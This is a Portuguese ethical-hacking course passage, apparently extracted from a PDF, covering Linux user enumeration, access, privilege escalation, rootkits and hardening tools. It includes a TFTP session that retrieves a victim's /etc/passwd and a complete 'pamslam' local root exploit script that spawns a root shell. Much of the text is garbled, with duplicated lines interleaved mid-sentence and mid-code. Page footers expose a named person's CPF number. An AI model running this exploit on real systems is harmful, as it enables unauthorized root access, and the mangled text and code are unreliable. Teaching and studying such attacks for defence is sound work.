endereço de e-mail ões, dependendo do s dados que são mantidos sobre
e -mail RFC822 com o sinal @. Se o usuário não existir, você vai os
usuários
receber de volta um "usuário desconhecido"como
no computador. Figer originou-se parte do
mensagem deBSD
[Link].
Apesar de um nome de usuário não
ser suficiente para o acesso, já é a metade do que é necessário para entrar na maioria dos sistemas.
Rwho e rusers são chamada de serviços de procedimento remoto (RPC) que podem dar informações
sobre os vários
Ganhando usuários do sistema. Executando p rpcinfo contra o sistema vai permitir que um
acesso
invasor descobra o estado de rwho e rusers. Rusers depende do daemon rwho. Ele lista os usuários
conectados a todas as máquinas locais, em que formato (nome do host, nome de usuário).
Depois de um sistema foi digitalizado e enumerou, o próximo passo é obter acesso. acesso. Tentativas de
ganhar acesso pode ocorrer remotamente ou localmente. Ataques remotos
Outra ferramenta potencial para usar a enumeração é Simple Mail Transfer Protocol são principalmente
(SMTP).
realizadas através de um dos quatro métodos.
SMTP às vezes pode ser útil na identificação de usuários. Atacantes ganham esta informação
usando o vrfy SMTP (verificar) e EXPN (expandir) comandos. Estes comandos podem ser usados
1) Explorar um processo ou programa.
para adivinhar utilizadores no sistema. Simplesmente nomes de entrada, e se o usuário exist e, você
receberá de volta um endereço de e -mail RFC822 com o sinal @. Se o usuário não existir, você vai
receber de volta um "usuário desconhecido" mensagem de erro. Apesar de um nome de usuário não 14
Ganhando acesso
ser suficiente para o acesso, já é a metade do que é necessário para entrar na maioria dos sistemas.

Depois de um sistema foi digitalizado e enumerou, o próximo passo é obter acesso. Tentativas de
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

2) Explorar um Transmission Control Protocol (TCP) ou User Datagram Protocol (UDP) ouvindo
serviço.

3) Explorar vulnerabilidades em um sistema que está fornecendo serviços de roteamento e fornecer


segurança entre duas ou mais redes.

4) Explorar o usuário fazendo-o iniciar algum tipo de ação como a execução de um anexo de e-mail
ou visitar um site hostil.

Independentemente de qual método é usado, a idéia é obter algum tipo de shell da máquina da
2)
vítima. Isto pode ser tão estúpido como adivinhar nomes de usuários e senhas para ataques mais
avançadas em canais de fundo que dependem do sistema da vítima para empurrar o shell para o
Explorar
atacante. um Transmission
Vejamos um exemplo Control Protocol
simples (TCP)um
de explorar ouprograma.
prUser Datagram
ograma. Protocol
Se a vítima (UDP) ouvindo
é encontrada
encontrada estar
serviço.
executando TFTP, você pode tentar levar a vítima a entregar arquivos críticos.

3) Explorar
root@mg vulnerabilidades
/root]# em um sistema que está fornecendo serviços de roteamento e fornecer
tftp [Link]
tftp> get /etc/passwd /root/[Link]
segurança entre duas ou
Received 1015 bytes in 0.0 mais redes.
seconds
tftp> quit
[root@mg /root]#more [Link]
4) Explorar o usuário fazendo-o iniciar algum tipo de ação como a execução de um anexo de e-mail
root:x:0:0:root:/root:/bin/bash
ou visitar um site hostil.
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
Independentemente de qual método é usado, a idéia é obter algum tipo de shell da máquina da
lp:x:4:7:lp:/var/spool/lpd:
vítima. Isto pode ser tão estúpido como adivinhar nomes de usuários e senhas para ataques mais
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
avançadas
root@mg em canaistftp
/root]# de fundo que dependem do sistema da vítima para empurrar o shell para o
[Link]
halt:x:7:0:halt:/sbin:/sbin/halt
atacante.
tftp> get Vejamos um exemplo
/etc/passwd simples de explorar um programa. Se a vítima é encontrada estar
/root/[Link]
mail:x:8:12:mail:/var/spool/mail:
Received 1015 bytes in 0.0 seconds
executando
quitTFTP, você pode tentar levar a vítima a entregar arquivos críticos.
news:x:9:13:news:/var/spool/news:
tftp>
operator:x:11:0:operator:/root:
[root@mg /root]#more [Link]
gopher:x:13:30:gopher:/usr/lib/gopher-data:
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/home/ftp:
bin:x:1:1:bin:/bin:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
daemon:x:2:2:daemon:/sbin:
named:x:25:25:Named:/var/named:/bin/false
adm:x:3:4:adm:/var/adm:
john:x:500:500:John:/home/jn:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:
clement:x:501:501:Clement:/cd/:/bin/csh
sync:x:5:0:sync:/sbin:/bin/sync
betty:x:502:502:Betty:/home/bd:/bin/pop
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
mike:x:503:503:Mike:/home/mg:/bin/bash
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
Embora você possa obter o arquivo passwd, você deve ter notado que as senhas foram sombreadas.
operator:x:11:0:operator:/root: sombreadas.
Este não foi um completo sucesso, no entanto, o atacante foi capaz de recuperar
gopher:x:13:30:gopher:/usr/lib/gopher-data: recuperar uma lista de
ftp:x:14:50:FTP User:/home/ftp:
usuários no sistema.
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
Nota
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
É importante especificar um diretório de destino ao utilizar TFTP para obter etc do host remoto / /
mike:x:503:503:Mike:/home/mg:/bin/bash
passwd. Caso contrário, você vai substituir seu próprio arquivo / etc / passwd.

Escalação de Privilégios.

Embora você possa obter o arquivo passwd, você deve ter notado que as senhas foram sombreadas.15
Este não foi um completo sucesso, no entanto, o atacante foi capaz de recuperar uma lista de
usuários no sistema.
Nota
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

Escalação de privilégios pode ser melhor descrito como o ato de alavancar um bug ou
vulnerabilidade em um sistema operacional ou aplicativo para ter acesso aos recursos, que
normalmente teria sido protegido de um usuário médio. Estes são os ataques que normalmente são
executados localmente e estão preocupados com
com o aumento de privilégio. O objetivo é forçar um
aplicativo para executar ações que são executadas dentro de um contexto de maior segurança do
que o pretendido pelo designer, e que ao hacker é concedido acesso local e controle total. Um
exemplo de um ataque local é a vulnerabilidade pamsl
pamslam
am encontrado em algumas versões
versões antigas
do Linux:
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@[Link]
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
Escalação de privilégios pode ser melhor descrito como o ato de alavancar um bug ou
#include<sys/types.h>
vulnerabilidade
void _init(void) em um sistema operacional ou aplicativo para ter acesso aos recursos, que
normalmente teria sido protegido de um usuário médio. Estes são os ataques que normalmente são
{
setuid(geteuid());
executados localmente e estão preocupados com o aumento de privilégio. O objetivo é forçar um
system("/bin/sh");
aplicativo para executar ações que são executadas dentro de um contexto de maior segurança do
}
que
#
EOF
o pretendido
pamslam pelo designer, ein
- vulnerability queRedhat
ao hacker é concedido
Linux 6.1 andacesso local e controle total. Um
PAM pam_start
exemplo
-n de
# found
echo byum
. ataque local é a vulnerabilidade pamsl am encontrado em algumas versões antigas
dildog@[Link]
cat >-e
_pamslam.c << EOF\\t$PWD/_pamslam.so > _pamslam.conf
do Linux:
echo auth\\
\\trequired
#include<stdlib.h>
trequired\\
trequired
chmod 755 _pamslam.conf
#include<unistd.h>
echo -n .
#include<sys/types.h>
gcc -fPIC -o _pamslam.o -c _pamslam.c
void
echo _init(void)
-n o
{ -shared -o _pamslam.so _pamslam.o
ld
echosetuid(geteuid());
-n o
chmodsystem("/bin/sh");
755 _pamslam.so
}
echo -n O
rm _pamslam.c
EOF
rm _pamslam.o
echo
echo -n
O .
echo -e auth\\trequired
/usr/sbin/userhelper -w\\ t$PWD/_pamslam.so > _pamslam.conf
../../..$PWD/_pamslam.conf
chmod
sleep 755
1s _pamslam.conf
echo -n .
rm _pamslam.so
gcc -fPIC -o _pamslam.o -c _pamslam.c
rm _pamslam.conf
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
Mantendo
chmod 755o _pamslam.so
acesso e Cobertura de Pistas.
echo -n O
rm _pamslam.c
rm _pamslam.o
Objetivo:
echo O
Explicar rootkits e contramedidas
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf

Depois de um atacante está em um sistema Linux e se fez


fez root, ele vai
v ai se preocupar
preocupar com a
manutenção do acesso e cobrir suas trilhas. Uma das melhores maneiras de manter o acesso é com
um rootkit. Um rootkit contém um conjunto de ferramentas e executáveis de reposição para muitos
dos componentes críticos do sistema operacional. Uma vez instalado, um rootkit pode ser usado
usado
para ocultar provas da presença do intruso
Mantendo o acesso e Cobertura de Pistas. e para permitir o ace
acesso
sso do backdoor invasor para o

16
Objetivo:
Explicar rootkits e contramedidas
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

sistema. Rootkits requerem acesso root, mas em troca eles dão ao invasor controle completo do
sistema. O atacante pode ir e vir à vontade e esconder suas atividades
atividades a partir do administrador.
Rootkits podem conter produtos de limpeza de registro que tentam remover
remover todos os vestígios
vestígios da
presença de um atacante a partir dos arquivos de log.
log.

Rootkits podem ser divididos em dois tipos básicos: tradicionais, que substituem os binários, e os
módulos carregáveis do kernel, que corrompem o kernel. Tradicionalmente, rootkits substituiu os
binários, como ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, ou ps com versões cavalo de
Tróia.. Estas versões cavalo de Tróia. ter sido escrito para ocultar
ocultar certos processos ou informações
dos administradores. Rootkits deste tipo são detectáveis
detectáveis por causa
c ausa da mudança no tamanho dos
binários de cavalo de Tróia.. Ferramentas, como MD5sum e Tripwire, pode ser uma grande ajuda
para descobrir esses tipos de hacks.
sistema. Rootkits requerem acesso root, mas em troca eles dão ao invasor controle completo do
sistema.
O segundoO atacante pode iré eo vir
tipo de rootkit à vontade
módulo e esconder
de kernel carregásuas
carregável atividadeUm
vel (LKM). s a partir
rootkitdodeadministrador.
kernel é
Rootkits podem conter produtos de limpeza de registro que tentam remover
carregado como um driver ou extensão do kernel. Como os rootkits de kernel corrompem todos os vestígoios da
kernel,
presença de um atacante a partir dos arquivos de log.
que podem fazer basicamente qualquer coisa, incluindo a detecção por métodos de muitos software. software.
A melhor maneira de evitar esses rootkits é simplesmente recompilar o kernel sem suporte para
Rootkits podem oser
LKMs. Embora divididos
uso em édois
de rootkits tipos básicos:
generalizada, tradicionais,
muitos que substituem
administradores nãos
ainda não binários,
o sabem e os
muito
módulos carregáveis
sobre eles, do kernel,
portanto, alguns dos que
maiscorrompem
populares, ocomo
kernel. Tradicionalmente,
Flea, T0rm, e Adorm, rootkits substituiu
são discutidos os
na lista
binários,
a seguir: como ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, ou ps com versões cavalo de
Tróia.. Estas versões cavalo de Tróia. ter sido escrito para ocultar certos processos ou informações
Flea. Uma vezRootkits
dos administradores. instalado, Fleatipo
deste esconde ações doisatacante
são detectáve atpor
acante dodaadministrador,
c ausa tornandodos
mudança no tamanho mais
bináriosfácil para ode
de cavalo atacante
Tróia..para reinserir ocomo
reinserir
Ferramentas, sistema em umae data
MD5sum posterior.
Tripwire, pode ser uma grande ajuda
para descobrir esses tipos de hacks.
 T0rm. Este rootkit é popular entre os hackers e é notável porque quebra netstat e em binário
ps tem
O segundo tipo31.336 bytes.
de rootkit é oAmbos
móduloosdeitens podem
kernel lhevel
carregá dar(LKM).
pistas deUm
querootkit
o rootkit foi instalado.
de kernel é
carregado comoAo
 Adorm. umcontrário
driver oudos
extensão
últimosdodois
kernel. Como
rootkits, os não
este rootkits
nã de kernel
o substitui corrompem
binários o kernel,
do sistema, pois é
que podem
um rootkit LKM. Adorm sistema intercepta chamadas e modifica-los quando necessário. .
fazer basicamente qualquer coisa, incluindo a detecção por métodos de muitos software
A melhor maneira
 Adorm de evitar
seqüestra esseschama
sistema rootkitse écria
simplesmente
um invólucrorecompilar
em torno odekernel sem suporte
cada chamada para
e depois
LKMs. limpa
Embora o uso de rootkits é generalizada, muitos administradores ainda não sabem muito
a saída.
sobre eles, portanto, alguns dos mais populares, como Flea, T0rm, e Adorm, são discutidos na lista

a seguir:
Dica.

Certifique-se
Flea. Umaque vezvocê pode descrever
instalado, um ações
Flea esconde módulodode kernel carregável
kernel
at acante e comotornando
do administrador, ele é diferente
mais
de um rootkit
fácil para otradicional.
atacante para reinserir o sistema em uma data posterior.

Hackers
T0rm.não sãorootkit
Este os únicos a utilizar
é popular Rootkits
entre os hackers e é notável porque quebra netstat e em binário
A partir de junho de 2004, a Sony c
começou
omeçou
ps tem 31.336 bytes. Ambos os itens podem a proteger
lhe darcópias
pistas alguns
de quedos CDs da
o rootkit foiempresa de
instalado.
música mais populares do pop. Um dos esquemas de proteção contra cópia que usou é
[Link]
concebido Aouma
contrário
empresadoschamada
últimos dois
Firstrootkits, esteEsta
4 Internet. nãopeça
substitui binárioscontra
de proteção do sistema,
cópia pois é
causou
um um rootkit
enorme LKM.
clamor deAdorm
protestosistema intercepta
por causa da maneirachamadas
que elee modifica-los
ele quando necessário.
instala e se esconde. O que causou
esteAdorm seqüestra
alvoroço é que o sistema
software chama e
funcionacria
de um
uma invólucro
forma queem torno
pode de
ser cada
vista chamada
como e depois e
subserviente
Dica.
limpa aNão
saída.
intrusivo. foi um anúncio da Sony que anunciou a presença presença deste software, foi por um
usuário, Mark Russinovich, correndo RootkitRevealer em um de seus próprios próprios sistemas.
Quando alguém tenta reproduzir um CD de música protegida com com este software
soft ware
ware,, um rootkit
Certifique-se
oculto que você
de programa pode descrever
de proteção de cópiaumé módulo
[Link] l carregável
pro gra
progra
grama
ma esconde e como ele é diferente
suas trilhas, então
de um rootkit tradicional.
17
Hackers não são os únicos a utilizar Rootkits
A partir de junho de 2004, a Sony começou a proteger cópias alguns dos CDs da empresa de
música mais populares do pop. Um dos esquemas de proteção contra cópia que usou é
concebido por uma empresa chamada First 4 Internet. Esta peça de proteção contra cópia causou
um enorme clamor de protesto por causa da maneira que ele instala e se esconde. O que causou
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

você não pode desinstalá-lo e você não pode descobrir o que exatamente foi instalado. Porque
ele é carregado de modo dissimulado, é possível que o software pode ser utilizado para lançar
lançar
vírus e cavalos desenvolvidas por outros. Por causa da instalação de cautela, seu antivírus não
seria capaz de detectar tal infecção.
infecção. Como que para piorar as coisas, se você é capaz de
encontrar e remover este software, ele desativa sua unidade de CD completamente e não não pode
mais ser usada. Se há alguma boa notícia, é que os computadores Linux
Linux não são afetados.

Todos os rootkits permitem ataques de um invasor:

 Executar sniffers secretamente para capturar senhas.

vocêTrojan
não pode desinstalá-lo
o binário de loginepara
vocêabrir
não um
podebackdoor
descobrirpara
o que exatamente
a qualquer foi instalado.
momento Porque
o acesso.
ele é carregado de modo dissimulado, é possível que o software pode ser utilizado para lançar
Substituir
vírus e cavalosprogramas utilitários
desenvolvidas que podem
por outros. ser usados
Por causa para detectar
da instalação a atividade
de cautela, do hacker.
seu antivírus não
seria capaz de detectar tal infecção. Como que para piorar as coisas, se você é capaz de
 Fornecer serviços públicos para a instalação de cavalos de tróia com os mesmos atributos de
encontrar e remover este software, ele desativa sua unidade de CD completamente e não pode
programas legítimos.
mais ser usada. Se há alguma boa notícia, é que os computadores Linux não são afetados.

Dica

Todos os rootkits permitem ataques de um invasor:
 Conheça os tipos de rootkits e como eles funcionam.
Executar
Como deve sniffers secretamente
um hacker para capturar
ético responder se elesenhas.
acredita que um sistema foi comprometido e

tem umorootkit
Trojan binárioinstalado? Sua abrir
de login para primeira ação será provavelmente
ação
um backdoor para a qualquermais para remover
momento o acesso.o
hospedeiro infectado a partir da rede. Um atacante
atacante que sabe que ele foi descoberto pode
enviar paraprogramas
Substituir o lixo o sistema em que
utilitários umapodem
tentativa
serde cobrirpara
usados seusdetectar
[Link] de ser
atividade isolado da
do hacker.
rede, você pode então começar o processo
processo de sistema de auditoria e realizar alguma pesquisa
Fornecer serviços
forense. Duas públicos
principais para a instalação
ferramentas podem desercavalos de tróia
usadas para comataques
auditar os mesmos atributos de
rootkit
programas
Dica
suspeitos: legítimos.

 Chkrootkit. Uma excelente ferramenta que pode ser usada para pesquisar sinais de um
rootkit. Ele tem a capacidade de analisar binários de sistema para modificação.
Conheça os tipos de rootkits e como eles funcionam.
 Rootkit Hunter. Outra ferramenta que analisa arquivos
arqu ivos binários e sistema de rootkits
conhecidos e desconhecidos.
Como deve um hacker ético responder se ele acredita que um sistema foi comprometido e
tem um rootkit instalado? Sua primeira ação será provavelmente mais para remover o
Encontrar
hospedeirooinfectado
rootkit não é o mesmo
a partir queUm
da rede. veratacante
a justiçaque
sersabe
[Link]
A esmagadora maioriapode
ele foi descoberto dos
indivíduos
enviar paraque atacam
o lixo sistemas
o sistema ficamtentativa
em uma [Link]
natureza
seusglobal da Depois
rastros. Internetde
torna difícil da
ser isolado

rastrear hackers e trazê-los à justiça.
rede, você pode então começar o processo de sistema de auditoria e realizar alguma pesquisa
forense. Duas principais ferramentas podem ser usadas para auditar ataques rootkit
 Endurecendo
suspeitos: o Linux

Objetivo:
Chkrootkit. Uma excelente ferramenta que pode ser usada para pesquisar sinais de um
Descrever
rootkit. Ele como o Linux
tem a capacidade é seguro.
de analisar binários de sistema para modificação.

Rootkit Hunter. Outra ferramenta que analisa arqu ivos binários e sistema de rootkits
conhecidos e desconhecidos.
18
Encontrar o rootkit não é o mesmo que ver a justiça ser feita. A esmagadora maioria dos
indivíduos que atacam sistemas ficam impune. A natureza global da Internet torna difícil
rastrear hackerso eLinux
Endurecendo trazê-los à justiça.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

.
Para evitar que o Linux seja hackeado, é importante endurecer o sistema e os serviços de
segurança. Mais tarde, no capítulo, olhamos para ferramentas, como o Nessus e SAINT, que
podem ser usadas para detectar formas que os atacantes podem entrar em seus sistemas Linux.
Linux.
Por enquanto, você precisa saber que após essas vulnerabilidades sejam identificadas,
identificadas, elas terão
de ser abordadas. Isto pode significar correção,
correção, remoção ou endurecimento desses serviços.
Colocação de um firewall na frente
frente de servidores críticos também é um passo importante.
Programas, como ipchains e iptables, também podem ser usados para filtrar e controlar o
tráfego. Outra solução fácil de remover programas e serviços se eles não
não são necessários. Isto é
conhecido como o princípio do menor privilégio.
privilégio. Alguns dos programas e serviços que são
considerados não-essenciais podem incluir:

.  Wget. Uma ferramenta não-interativa para buscar dados sobre HTTP HTTP / HTTPS e FTP.
FTP.
Para evitar que o Linux seja hackeado, é importante endurecer o sistema e os serviços de
 Finger.
segurança. MaisPermite recuperar
tarde, no informaç
informações
capítulo, olhamosões básicas
para sobre umcomo
ferramentas, usuário da Internet
o Nessus ou deque
e SAINT,
acolhimento.
podem ser usadas para detectar formas que os atacantes podem entrar em seus sistemas Linux.
Por enquanto, você precisa saber que após essas vulnerabilidades sejam identificadas, elas terão
 Navegador baseado em texto Lynx que suporta HTTP / HTTPS e FTP.
de ser abordadas. Isto pode significar correção, remoção ou endurecimento desses serviços.
Colocação
 Curl. deUma
um firewall na fre
ferramenta nte de
como servidores
wget-que críticos
também também
suporta é um passo
protocolos como importante.
o Telnet e
Programas,
 [Link] ipchains e iptables, também podem ser usados para filtrar e controlar o
tráfego. Outra solução fácil de remover programas e serviços se eles não são necessários. Isto é
 SCP.
conhecido Transferência
como o princípiosegura de arquivos
do menor usando
privilégio. Algunso protocolo SSH. e serviços que são
dos programas
considerados não-essenciais podem incluir:
 FTP. A linha de comando cliente de FTP.
 Wget. Uma ferramenta não-interativa para buscar dados sobre HTTP / HTTPS e FTP.
 Telnet. O cliente Telnet Linux de linha de comando.
 Finger. Permite recuperar informações básicas sobre um usuário da Internet ou de
 TFTP. Trivial FTP.
acolhimento.
 Ping. Também pode ser usado como uma ferramenta de DoS bastante rudimentar.
Navegador baseado em texto Lynx que suporta HTTP / HTTPS e FTP.
 Desligando
Curl. serviços desnecessários,
Uma ferramenta como wget-queremover
tambémprogramas desnecessários,
suporta protocolos como oe Telnet
aplicar eos
patches
[Link] segurança mais recentes é conhecido como endurecimento
endurecimento sistema. Ao tentar
 endurecer o seu sistema Linux, uma boa fonte de informação é as diretrizes da NSA de
SCP. Transferência
endurecimento, poissegura de arquivos
eles podem usando o protocolo
ser encontrados SSH.
em [Link]/snac
[Link]/snac..

FTP. A linhaade
Em seguida comando
discussão cliente de
é chroot. [Link] coloca um programa
Chroot prog rama em uma

sandbox. O termo refere-se a caixa de areia no
Telnet. O cliente Telnet Linux de linha de comando. conceito de se limitar a atividade de um
programa de aplicação e dos limites. Mais precisamente, ele ele redefine o diretório raiz
TFTP. Trivial
ou/de um FTP. ou sessão de login. Tudo fora do diretório que você definir que
programa
chroot pode usar não existe até um programa estar em causa. Ele efetivamente prende
Ping. Também
um processo empode
umaser usado
parte como uma
do sistema ferramenta
de arquivo de DoS
a partir bastante
do qual rudimentar.
o processo não pode
escapar. Devido a este bloqueio, é importante lembrar que todos os arquivos necessários
Desligando serviços
a uma programa desnecessários,
chroot remover programas
para a funcionalidade desnecessários,
adequada deve e aplicar
estar presente dentroos
da
patches de segurança mais recentes é conhecido como endurec imento sistema.
prisão. Chroot é comumente usado por programas como FTP, BIND, e-mail, e Apache. Ao tentar
endurecer o seu sistema Linux, uma boa fonte de informação é as diretrizes da NSA de
endurecimento,
Envoltório (TCPpois eles podem
Wrapper) TCP éseroutra
encontrados emque
ferramenta [Link]/snac .
pode ser usada para endurecer

Em seguida a discussão é chroot. Chroot basicamente coloca um prog rama em uma 19


sandbox. O termo refere-se a caixa de areia no conceito de se limitar a atividade de um
programa de aplicação e dos limites. Mais precisamente, ele redefine o diretório raiz
ou/de um programa ou sessão de login. Tudo fora do diretório que você definir que
chroot pode usar não existe até um programa estar em causa. Ele efetivamente prende
um processo em uma parte do sistema de arquivo a partir do qual o processo não pode
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55

Linux. Wietse Venema desenvolveu o programa TCP Wrapper para proteger os


computadores contra ataques de hackers.
hackers. Por muitos
mui tos anos, este foi um dos métodos
padrão utilizados para endurecer Linux. Está agora
agora a ser substituídos por xinetd.d, que é
considerada mais granular. Serviços de rede como Finger,
Finger, FTP, rlogin, Telnet e TFTP
pode ser configurado para uso TCP Wrapper. Mais informações sobre TCP Wrapper
seguinte forma:

 TCP Wrapper permite que você especifique quais hosts têm permissão de acesso.

 TCP Wrapper é ativada por ter inetd que chama o daemon wrapper
wrapper TCP.

 TCP Wrapper pode ser utilizado com TCP ou UDP.

 Linux.
Dois Wietse são
arquivos Venema desenvolveu
usados o programa
para verificar [Link] Wrapper
acesso para proteger os
e [Link].
computadores contra ataques de hackers. Por mui tos anos, este foi um dos métodos
 padrão
O utilizados
serviço funcionapara
porendurecer
TCP WrapperLinux. Está agora entre
inserindo-se a ser osubstituídos
serviço e opor xinetd.d,
mundo que é
exterior.
considerada
Você usa doismais granular.
arquivos paraServiços
a gestãode derede comodeFinger
controle acesso:, FTP, rlogin, Telnet e TFTP
 pode ser configurado para uso TCP Wrapper. Mais informações sobre TCP Wrapper
 [Link]. Lista todos os anfitriões com conectividade com o sistema que pode se
seguinte forma:
 conectar a um serviço específico.
TCP Wrapper permite que você especifique quais hosts têm permissão de acesso.
 [Link]. funciona da mesma forma como como a maioria das ACL AC Ls, porque se não for
TCP Wrapper épermitido,
expressamente ativada poro ter inetdserá
acesso quenegado.
chama o daemon wrapper TCP.

TCP Wrapper pode ser utilizado com TCP ou UDP.


Tripwire é uma ferramenta valiosa que pode ser usada para proteger os sistemas Linux.
Tripwire
 Dois é o programa
arquivos são usados de para
integridade
[Link]
arquivo mais comumente
acesso usado. Ele realiza
e [Link].
verificação de integridade usando checksums criptográficas. Tripwire pode ajudar a
identificar se alguma
O serviço funciona adulteração
por TCP Wrapper em arquivo ocorreu.
inserindo-se É ocomumente
entre serviço e ousada
mundo com sistemas
exterior.
de IDS, porque pode ser utilizado para manter uma
 Você usa dois arquivos para a gestão de controle de acesso: image
imagem m do sistema durante um
estado conhecido. Se rootkits ou outras alterações são feitas, Tripwire pode detectá-lo.
[Link]. Listasua
Tripwire realiza todos os anfitriões
magia, criando um com conectividade
valor de hash de com o sistema
sentido que pode
único para se e
arquivos
conectar a um
diretórios. Esteserviço
hash é específico.
armazenado, e em seguida, verifica periodicam
periodicamenteente se novos são
executados. O novo valor digitalizado é comparado com as que estão armazenadas. Se
[Link]. funciona
os dois valores da mesma forma
não coincidirem, comoum
é definido a maioria das AC
sinalizador e umLs,administrador
porque se nãodevefor agir.
deve
expressamente permitido, o acesso será negado.
O arquivo de política Tripwire é [Link] e pode ser encontrado
encontrado no diretório / etc /
arame.
Tripwire é uma ferramenta valiosa que pode ser usada para proteger os sistemas Linux.
Tripwire
Dica é o programa de integridade de arquivo mais comumente usado. Ele realiza
verificação de integridade usando checksums criptográficas. Tripwire pode ajudar a
identificar
Ser capaz dese descrever
alguma adulteração em arquivo utilizadas
as várias ferramentas ocorreu. Épara
comumente
proteger usada
o Linuxcom
Linux sistemas
como
de IDS, porque
Tripwire e TCP pode ser utilizado para manter uma imagem do sistema durante um
Wrapper.
estado conhecido. Se rootkits ou outras alterações são feitas, Tripwire pode detectá-lo.
Tripwire realiza sua magia, criando um valor de hash de sentido único para arquivos e
Finalmente, háEste
diretórios. logging.
hash Embora o logging
é armazenado, e emnão irá impedir
seguida, um periodicam
verifica ataque, ele
ele ente
é uma
se ferramenta
novos são
útil executados.
para determinar o que aconteceu. Linux vai permitir a autenticaçã
autenticação o d
dee
O novo valor digitalizado é comparado com as que estão armazenadas. Sesistemas,
aplicações
os dois evalores
protocolos. A saída da maioria
não coincidirem, dosum
é definido loggings são mantidos
sinalizador mae ntidos no diretóriod/eve
um administrador var agir.
/
[Link]
você está
de curioso
política sobre quem
Tripwire se conectou
conectou
é [Link] ao sistema,
e pode você pode
ser encontrado usar o arquivo
no diretório / etc /
arame.
Dica
20

Ser capaz de descrever as várias ferramentas utilizadas para proteger o Linux como
Tripwire e TCP Wrapper.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

lastlog. O arquivo / var / log / lastlog acompanha o último login de contas de usuário no
sistema.

Dica

Saiba que registros de usuários estão localizados


localizados em / var / log /.

Ferramentas Automatizadas
Automatizadas de Avaliação.
Avaliação.

Nem sempre é possível


possível realizar todos os testes
testes de segurança manualmente.
manualmente. Muitas verificações,
verificações, exames e
correções são melhores
melhores realizadas por ferramentas
ferramentas automatizadas. São
São tantas descobertas novas
novas de
lastlog. O arquivo / var / log / lastlog acompanha
vulnerabilidades diária que é difícil manter-se. Se você o último
você não está usandologin de contas
automatizado deno
de usuário
usando um sistema automatizado
sistema.
gestão de patches, como
como você sabe se todos os patches que que deveriam na verdade ter sido instalados?
Dica
Para combater esses
esses problemas, os hackers
hackers éticos podem
podem se beneficiar de ferramentas
ferramentas de avaliação
automatizadas. Na maioria
maioria das situações, os hackers
hackers éticos vão usar uma combinação de ferramentas
ferramentas
manuais e automatizadas.
automatizadas. Ferramentas automatizadas
automatizadas permitem
permitem que o hacker ético possa cobrir um lote
Saiba que registros de usuários estão localizados em / var / log /.
de
Ferramentas Automatizadas de Avaliação. mais inspeção
terreno rapidamen
rapidamente te e usar os resultad
resultados os para mais inspeção manual. Toda uma gama gama de
ferramentas de avaliação
avaliação de segurança estão estão disponíveis. Algumas olham para o código fonte, as outras
Nem sempre
olham é possível
para aplicações,
aplicaçõe s, erealizar
outrostodos
ainda ossãotest es de
desen segurança
desenvolvidas
volvidas paramanual mente.
olhar para Muitasinteiros
sistemas verificaç
inteiros ouões, exames
redes. Essase
correçõestambém
soluções são melhtêm
têores realizadas epor
m usabilidade ferramentas
interfa
interfaces automatizadas.
ces diferentes, que variam Sãodetantas
variam linha descobertas
comando nnas
de comando ovas de
interfaces
vulnerabilidades
GUI para [Link]ária
Estesque é difícil também
produtos manter-se.
també Se você
m podem ser não está usand
divididos em outras
em o um categorias,
sistema auto matizado
com
comoo algunsdesão
gestão deepatches,
gratuitos outros são
outros como
para você sabe ou
compra se todos
que são osexecutados
patches queatravés
deveriam una
de um m verdade terassinatura.
serviço de sido instalados?

Para combater esses problemas, os hackers éticos podem se beneficiar de ferramentas de avaliação
automatizadas. Na mai
Categorias ferramenta
ferramen taoria das situações,
automatizada os hacker
liação s éticos vão usar uma combinação de ferramentas
de Avaliação
Ava
manuais e automatizadas. Ferramentas automatizadas permitem que o hacker ético possa cobrir um lote
de terreno rapidamente e usar os resultados para mais mais inspeção manual. Toda uma gama de
ferramentas de avaliação de segurança estão disponíveis. Algumas olham para o código fonte, as outras
Objetivo:
olham para aplicações, e outros ainda são desenvolvidas para olhar para sistemas inteiros ou redes. Essas
Discutir
soluçõesos diferenttê
diferentes
também esmtipos de instrumentos
instrument
usabilidade osces
e interfa automatizados de avaliação.
diferentes, que avalia
variamção.
de linha de comando nas interfaces
GUI para produtos. Estes produtos também podem ser divididos em outras categorias, como alguns são
